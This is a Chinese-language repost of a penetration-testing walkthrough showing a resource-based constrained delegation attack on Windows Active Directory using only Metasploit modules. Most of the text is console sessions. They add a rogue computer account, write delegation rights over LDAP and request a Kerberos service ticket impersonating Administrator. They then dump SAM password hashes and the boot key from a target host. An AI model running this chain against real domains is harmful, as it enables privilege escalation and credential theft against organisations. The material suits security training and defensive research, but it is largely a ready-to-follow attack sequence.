msf6 auxiliary(admin/dcerpc/samr_computer)> show options
Module options (auxiliary/admin/dcerpc/samr_computer):
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_NAME no The computer name
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass Password1 no The password for the specified username
SMBUser n00py no The username to authenticate as
When ACTION is ADD_COMPUTER:
Name Current Setting Required Description
---- --------------- -------- -----------
COMPUTER_PASSWORD no The password for the new computer
Auxiliary action:
Name Description
---- -----------
ADD_COMPUTER Add a computer account
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/dcerpc/samr_computer) > run
[*] Running module against 172.16.73.6
[+] 172.16.73.6:445 - Successfully created n00py.localDESKTOP-MKFA61G6$
[+] 172.16.73.6:445 - Password: 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj
[+] 172.16.73.6:445 - SID: S-1-5-21-3387312503-3460017432-368973690-1135
[*] Auxiliary module execution completed
一旦您获得了新的计算机帐户,我们就必须在受害者计算机上配置委派权限。& nbsp;对于Impacket,我们将使用rbcd.py,但这里我们将使用辅助/admin/ldap/rbcd。
msf6 auxiliary(admin/ldap/rbcd) > show options
Module options (auxiliary/admin/ldap/rbcd):
Name Current Setting Required Description
---- --------------- -------- -----------
DELEGATE_FROM DESKTOP-MKFA61G6$ no The delegation source
DELEGATE_TO WIN-27M967MQJL4$ yes The delegation target
DOMAIN n00py.local no The domain to authenticate to
PASSWORD Password1 no The password to authenticate with
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 389 yes The target port
SSL false no Enable SSL on the LDAP connection
USERNAME n00py no The username to authenticate with
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > write
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
[*] Added account:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/rbcd) > read
[*] Running module against 172.16.73.6
[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 172.16.73.6:389 Getting root DSE
[+] 172.16.73.6:389 Discovered base DN: DC=n00py,DC=local
[*] Allowed accounts:
[*] S-1-5-21-3387312503-3460017432-368973690-1135 (DESKTOP-MKFA61G6$)
[*] Auxiliary module execution completed
一旦我们配置了委派,我们就可以为任何用户请求服务票证。& nbsp;对于Impacket,我们将使用getST.py,但这里我们将使用辅助/admin/kerberos/get_ticket。我们将使用Metasploit保存的最终服务票证。
msf6 auxiliary(admin/kerberos/get_ticket) > show options
Module options (auxiliary/admin/kerberos/get_ticket):
Name Current Setting Required Description
--------------- -------- -----------
AES_KEY no The AES key to use for Kerberos authentication in hex string. Supported keys: 128 or 256 bits
CERT_FILE no The PKCS12 (.pfx) certificate file to authenticate with
CERT_PASSWORD no The certificate file's password
DOMAIN n00py.local no The Fully Qualified Domain Name (FQDN). Ex: mydomain.local
NTHASH no The NT hash in hex string. Server must support RC4
PASSWORD 7TH6BPcPqXo5OLTIy3XJbwS77d3VPhyj no The domain user's password
RHOSTS 172.16.73.6 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish Kerberos connection and read data
USERNAME DESKTOP-MKFA61G6$ no The domain user
When ACTION is GET_TGS:
Name Current Setting Required Description
--------------- -------- -----------
IMPERSONATE Administrator no The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)
SPN CIFS/WIN-27M967MQJL4.n00py.local no The Service Principal Name, format is service_name/FQDN. Ex: cifs/dc01.mydomain.local
Auxiliary action:
Name Description
-----------
GET_TGS Request a Ticket-Granting-Service (TGS)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/kerberos/get_ticket) > set verbose true
verbose => true
msf6 auxiliary(admin/kerberos/get_ticket) > run
Running module against 172.16.73.6
172.16.73.6:88 - Received a valid TGT-Response
172.16.73.6:88 - TGT MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_994901.bin
172.16.73.6:88 - Getting TGS impersonating [email protected] (SPN: CIFS/WIN-27M967MQJL4.n00py.local)
172.16.73.6:88 - Received a valid TGS-Response
172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_606526.bin
172.16.73.6:88 - Received a valid TGS-Response
172.16.73.6:88 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin
Auxiliary module execution completed
最后,一旦我们有了这个票,我们就可以在目标上执行管理操作。通常情况下,pentester会使用Impacket的secretsdump.py或CrackMapExec(在后台是相同的东西)来恢复系统的凭据。我们可以使用Metasploit的辅助/gather/windows_secrets_dump模块来执行此操作,相当于在CrackMapExec中同时运行-sam和-lsa。这里唯一棘手的部分是使其与Kerberos身份验证一起工作,这需要进入高级选项。
msf6 auxiliary(gather/windows_secrets_dump) > show options
Module options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.16.73.12 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain n00py.local no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser Administrator no The username to authenticate as
Auxiliary action:
Name Description
---- -----------
ALL Dump everything
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > show advanced
Module advanced options (auxiliary/gather/windows_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
[TRUNCATED]
SMB::Auth kerberos yes The Authentication mechanism to use (Accepted: auto, ntlm, kerberos)
[TRUNCATED]
Active when SMB::Auth is kerberos:
Name Current Setting Required Description
---- --------------- -------- -----------
DomainControllerRhost WIN-NDA9607EHKS.n00py.local no The resolvable rhost for the Domain Controller
KrbCacheMode read-write yes Kerberos ticket cache storage mode (Accepted: none, read-only, write-only, read-write)
SMB::Krb5Ccname /root/.msf4/loot/20230130152544_default_172.16.73.6_mit.kerberos.cca_662784.bin no The ccache file to use for kerberos authentication
SMB::KrbOfferedEncryptionTypes AES256,AES128,RC4-HMAC,DES-CBC-MD5,DES3-CBC-SHA1 yes Kerberos encryption types to offer
SMB::Rhostname WIN-27M967MQJL4.n00py.local no The rhostname which is required for kerberos - the SPN
View the full module info with the info, or info -d command.
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 172.16.73.12
[*] 172.16.73.12:445 - Opening Service Control Manager
[*] 172.16.73.12:445 - Binding to svcctl...
[+] 172.16.73.12:445 - Bound to svcctl
[*] 172.16.73.12:445 - Service RemoteRegistry is in stopped state
[*] 172.16.73.12:445 - Starting service...
[*] 172.16.73.12:445 - Retrieving target system bootKey
[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaJD
[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaSkew1
[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaGBG
[*] 172.16.73.12:445 - Retrieving class info for SYSTEMCurrentControlSetControlLsaData
[+] 172.16.73.12:445 - bootKey: 0x1a9c42b4c664bb5ab1c699858559fc76
[*] 172.16.73.12:445 - Checking NoLMHash policy
[*] 172.16.73.12:445 - LMHashes are not being stored
[*] 172.16.73.12:445 - Saving remote SAM database
[*] 172.16.73.12:445 - Create SAM key
[*] 172.16.73.12:445 - Save key to PUnE0CMU.tmp
[*] 172.16.73.12:445 - Dumping SAM hashes
[*] 172.16.73.12:445 - Calculating HashedBootKey from SAM
[*] 172.16.73.12:445 - Password hints:
No users with password hints on this system
[*] 172.16.73.12:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0abb98152c261c4c23429ed9eecc117:::
[TRUNCATED]
[*] Auxiliary module execution completed
承接以下业务:
欢迎添加微信业务咨询:
原文始发于微信公众号(网络安全交流圈):使用纯Metasploit开发基于资源的约束委托(RBCD)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论